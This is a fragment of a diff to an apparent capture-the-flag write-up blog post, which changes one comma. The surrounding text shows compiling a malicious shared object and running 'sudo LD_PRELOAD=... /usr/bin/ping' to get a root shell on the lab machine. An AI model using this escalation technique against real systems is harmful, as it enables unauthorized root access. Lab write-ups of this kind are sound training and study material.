MPLhack3d/MPLhack3d.github.io/_posts/2025-02-18-thm-creative-writeup.md

 gcc -fPIC -shared -o shell.so shell.c -nostartfiles
 ```

-I was able to specify the `LD_PRELOAD` to point to my shared object, started a ping using `sudo` and became root.
+I was able to specify the `LD_PRELOAD` to point to my shared object, started a ping using `sudo`, and became root.
 From there I was able to retrieve the root flag:
 ```bash
 $ sudo LD_PRELOAD=/home/saad/shell.so /usr/bin/ping
 root@m4lware:/home/saad# cd /root